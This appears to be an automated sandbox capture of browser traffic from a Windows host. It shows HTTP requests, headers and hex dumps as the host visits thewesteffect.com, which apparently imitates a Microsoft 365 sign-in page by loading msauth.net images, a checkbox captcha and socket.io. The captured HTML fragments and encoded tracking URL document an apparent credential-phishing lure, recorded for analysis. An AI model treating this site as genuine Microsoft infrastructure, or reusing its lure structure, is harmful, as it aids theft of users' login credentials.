                                          2024-11-18 22:43:56 UTC8000INData Raw: 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 6c 61 62 65 6c 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78
                                          Data Ascii: 43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20label\x20{\x0a\x20\x
                                          2024-11-18 22:43:56 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e
                                          Data Ascii: \x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20poin
                                          2024-11-18 22:43:56 UTC8000INData Raw: 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                          Data Ascii: gsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22\x0a\x20\x20\x20\x20\
                                          2024-11-18 22:43:56 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                          Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                          2024-11-18 22:43:56 UTC8000INData Raw: 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                          Data Ascii: t\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.44975113.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC655OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC806INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 1435
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                          ETag: 0x8DB5C3F4911527F
                                          x-ms-request-id: 4de04481-601e-0065-6362-361aad000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224357Z-16547b76f7ftfv4jhC1DFWuhug00000003zg00000000npe1
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:57 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                          Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.44975213.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC675OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC785INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 2407
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                          ETag: 0x8DB5C3F499A9B99
                                          x-ms-request-id: 6158e1f5-201e-0006-7d33-388756000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224357Z-1866b5c5fbbg9tvxhC1DFWy9mg000000028000000000qgyb
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:57 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                          Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.44975313.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC658OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC805INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 199
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                          ETag: 0x8DB5C3F49C21D98
                                          x-ms-request-id: 5618f972-001e-0068-57a1-379a6b000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224357Z-16547b76f7fz92z5hC1DFWmdx800000004s000000000cd6v
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:57 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                          Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.44975013.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC654OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                          Host: aadcdn.msauth.net
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC805INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 673
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                          ETag: 0x8DB5C3F47E260FD
                                          x-ms-request-id: b31c827f-601e-0075-1b33-36dfc5000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224356Z-16547b76f7fwcwmrhC1DFWtp04000000028g00000000s4q6
                                          x-fd-int-roxy-purgeid: 4554691
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:57 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                          Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.44974713.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC653OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                          Host: logincdn.msauth.net
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://thewesteffect.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC806INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Content-Type: image/svg+xml
                                          Content-Length: 276
                                          Connection: close
                                          Cache-Control: public, max-age=31536000
                                          Content-Encoding: gzip
                                          Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                          ETag: 0x8D79ED35591CF44
                                          x-ms-request-id: ac693482-901e-0056-18c2-3932b9000000
                                          x-ms-version: 2009-09-19
                                          x-ms-lease-status: unlocked
                                          x-ms-blob-type: BlockBlob
                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                          Access-Control-Allow-Origin: *
                                          x-azure-ref: 20241118T224357Z-16547b76f7fqqjnnhC1DFWxv7400000004v0000000000e6p
                                          x-fd-int-roxy-purgeid: 79218156
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:43:57 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                          Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.449754192.254.232.1334435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:56 UTC671OUTGET /favicon.ico HTTP/1.1
                                          Host: thewesteffect.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC306INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:57 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Tue, 25 Mar 2014 18:04:14 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 2780
                                          Cache-Control: max-age=604800
                                          Expires: Mon, 25 Nov 2024 22:43:57 GMT
                                          Content-Type: image/x-icon
                                          2024-11-18 22:43:57 UTC2780INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 08 00 ab 03 00 00 26 00 00 00 20 20 00 00 01 00 08 00 0b 07 00 00 d1 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 03 72 49 44 41 54 38 cb 65 8f 59 68 5c 65 00 85 cf ff ff 77 72 e7 de 3b fb 98 65 26 cb 74 9c 4c 9b 26 99 34 6d 69 63 52 14 34 a6 49 a9 c6 ba 14 c1 e5 49 45 b4 3e f8 24 45 b0 8a 0a d2 a7 d2 17 05 a5 a0 0f 22 14 8b 08 a2 60 51 b4 76 79 48 2a d1 34 b4 4d da 2c 36 db 4c 66 32 93 99 3b 77 bf ff f5 a5 14 97 f3 fc 9d 8f 73 88 d8 ff 0c fe 17 ce 43 72 5b f6 14 af 54 c2 ba 9a 7f 13 84 2c 33 41 02 a5 3e d8 96 0a 42 c8 3d 94 09 2d dd ff ea 7a 8e 03 31 d1 fe 7a 6c d7 f0 71 49 0f 74 db 66 e9 3e db d6 a6 41 88 4a 40 fd 9c 3b f6 3f 05 e4 bf 0b 3c d7 91 e3
                                          Data Ascii: & PNGIHDRarIDAT8eYh\ewr;e&tL&4micR4IIE>$E"`QvyH*4M,6Lf2;wsCr[T,3A>B=-z1zlqItf>AJ@;?<


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.44974613.35.58.914435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:57 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                          Host: cdn.socket.io
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:57 UTC703INHTTP/1.1 200 OK
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 49993
                                          Connection: close
                                          Accept-Ranges: bytes
                                          Access-Control-Allow-Origin: *
                                          Cache-Control: public, max-age=31536000, immutable
                                          Content-Disposition: inline; filename="socket.io.min.js"
                                          Date: Thu, 05 Sep 2024 12:10:03 GMT
